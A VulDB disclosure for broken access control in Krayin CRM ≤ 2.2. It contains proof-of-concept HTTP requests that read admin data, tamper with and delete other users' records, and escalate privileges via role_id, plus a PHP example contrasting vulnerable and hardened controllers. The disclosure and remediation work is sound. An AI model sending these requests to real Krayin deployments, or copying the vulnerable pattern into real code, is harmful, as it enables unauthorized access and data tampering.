| Field | Value |
|---|---|
| Title | Webkul Krayin CRM (krayin/laravel-crm) ≤ 2.2 (latest) CWE-862 (Missing Authorization), CWE-639 (IDOR) |

Description:

VulDB Submission — Krayin CRM
Vendor: Webkul
Product: Krayin CRM (krayin/laravel-crm)
Version: ≤ 2.2 (latest)
URL: https://github.com/krayin/laravel-crm
Vulnerability Class: CWE-862 (Missing Authorization), CWE-639 (IDOR)
Risk: High
CVSS 3.1: 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
───
Title: Broken Access Control (IDOR + Mass Assignment) in Krayin CRM ≤ 2.2
Description:
Multiple controllers in Krayin CRM use findOrFail($id) without ownership verification. Any authenticated low-privilege user can:
1. IDOR — Read any record: GET /admin/contacts/persons/view/{id}, GET /admin/leads/view/{id}, GET /admin/settings/users/edit/{id} — returns full data including admin user details, deal values, contact PII.
2. IDOR — Modify/Delete any record: PUT /admin/leads/edit/{id}, DELETE /admin/contacts/persons/{id} — any user can modify or delete other users' records.
3. Mass Assignment — Privilege Escalation: The User model includes role_id and status in $fillable, and update() uses request()->all(). A low-privilege user can escalate to admin by sending role_id=1.
Affected endpoints:
• Persons: view/edit/update/delete (/admin/contacts/persons/*)
• Leads: view/edit/update/delete (/admin/leads/*)
• Quotes: edit/delete (/admin/quotes/*)
• Activities: edit/delete (/admin/activities/*)
• Users: edit (/admin/settings/users/edit/{id})
Affected files:
• packages/Webkul/Admin/src/Http/Controllers/Settings/UserController.php
• packages/Webkul/Admin/src/Http/Controllers/Contact/PersonController.php
• packages/Webkul/Admin/src/Http/Controllers/Lead/LeadController.php
• packages/Webkul/User/src/Models/User.php ($fillable: role_id, status)
───
Proof of Concept:
Environment: Krayin CRM 2.2, PHP 8.3, MySQL 8.0
• Admin user: id=1 ([email protected])
• Low-priv user: id=2 ([email protected])
Test 1 — Read admin user details:
GET /admin/settings/users/edit/1
Cookie: [low_priv_session]
→ HTTP 200 with admin email, role, permissions
Test 2 — Modify admin's lead:
PUT /admin/leads/edit/1
Cookie: [low_priv_session]
Body: title=HACKED&lead_value=0&status=1&lead_pipeline_id=1&lead_pipeline_stage_id=1
→ HTTP 200 — "Leads updated successfully."
→ Admin's "$999,999 deal" changed to "HACKED", value set to 0
Test 3 — Delete other user's contact:
DELETE /admin/contacts/persons/4
Cookie: [low_priv_session]
→ HTTP 200 — "delete-success"
───
Countermeasure:
Add ownership verification in all show/edit/update/destroy methods using bouncer()->getAuthorizedUserIds(). Remove role_id and status from User $fillable. Use $request->validated() instead of request()->all().
Researcher: Nguyen Manh (0xmanhnv) — VulDB ID: 70158
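The countermeasure above, as an added example that is not part of the submission or of Krayin's code: the vulnerable update() pattern beside a hardened one. Assumed: the Lead model namespace, a user_id owner column on leads, the hypothetical UpdateLeadRequest, and that bouncer()->getAuthorizedUserIds() returns the ids the caller may act for, or null when the caller is unrestricted.

```php
<?php
// Added example, not Krayin's code: the update() pattern the submission describes
// beside a hardened version. Assumed: the Lead model namespace, a user_id owner
// column, the hypothetical UpdateLeadRequest, and that bouncer()->getAuthorizedUserIds()
// returns the ids the caller may act for, or null when the caller is unrestricted.

namespace Example\Http\Controllers;

use Illuminate\Foundation\Http\FormRequest;
use Webkul\Lead\Models\Lead; // assumed model namespace

// BEFORE: no ownership check, and every posted column is mass-assigned.
class VulnerableLeadController
{
    public function update(int $id)
    {
        $lead = Lead::findOrFail($id);     // any authenticated user reaches any id
        $lead->update(request()->all());   // role_id, user_id, ... all accepted
        return response()->json(['message' => 'Leads updated successfully.']);
    }
}

// Hypothetical FormRequest: only these fields can reach the model.
class UpdateLeadRequest extends FormRequest
{
    public function rules(): array
    {
        return [
            'title'                  => 'required|string|max:255',
            'lead_value'             => 'nullable|numeric|min:0',
            'lead_pipeline_id'       => 'required|integer',
            'lead_pipeline_stage_id' => 'required|integer',
        ];
    }
}

// AFTER: ownership check first, then a validated whitelist instead of request()->all().
class HardenedLeadController
{
    public function update(UpdateLeadRequest $request, int $id)
    {
        $lead = Lead::findOrFail($id);
        $allowed = bouncer()->getAuthorizedUserIds();   // null = unrestricted (assumed)
        if ($allowed !== null && ! in_array($lead->user_id, $allowed)) {
            abort(403, 'Not authorized to modify this lead.');  // deny before any write
        }
        $lead->update($request->validated());   // only whitelisted, validated fields
        return response()->json(['message' => 'Leads updated successfully.']);
    }
}
```

The same ownership check belongs in show/edit/destroy as well, and the User model fix (dropping role_id and status from $fillable) closes the separate privilege-escalation path.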

| Field | Value |
|---|---|
| Source | https://github.com/krayin/laravel-crm |
| User | 0xmanhnv (UID 70158) |
| Submission | 23.03.2026 05:34 (26 days ago) |
| Moderation | 17.04.2026 08:38 (25 days later) |
| Status | Duplicate |
| VulDB entry | 357338 [Krayin CRM 2.2.x GET PersonController.php privilege escalation] |
| Points | 0 |